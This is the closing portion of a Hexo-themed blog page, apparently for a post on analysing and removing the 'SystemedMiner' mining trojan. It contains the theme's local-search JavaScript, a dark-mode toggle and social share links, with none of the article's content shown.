    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + SystemedMiner%E6%8C%96%E7%9F%BF%E6%9C%A8%E9%A9%AC%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%84%E7%BD%AE + '&url=' + http%3A%2F%2Fexample.com%2F2022%2F04%2F01%2F%5B%25E5%25BA%2594%25E6%2580%25A5%25E5%2593%258D%25E5%25BA%2594%5D-SystemedMiner%25E6%258C%2596%25E7%259F%25BF%25E6%259C%25A8%25E9%25A9%25AC%25E5%2588%2586%25E6%259E%2590%25E4%25B8%258E%25E5%25A4%2584%25E7%25BD%25AE%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/2022/04/01/[%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94]-SystemedMiner%E6%8C%96%E7%9F%BF%E6%9C%A8%E9%A9%AC%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%84%E7%BD%AE/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
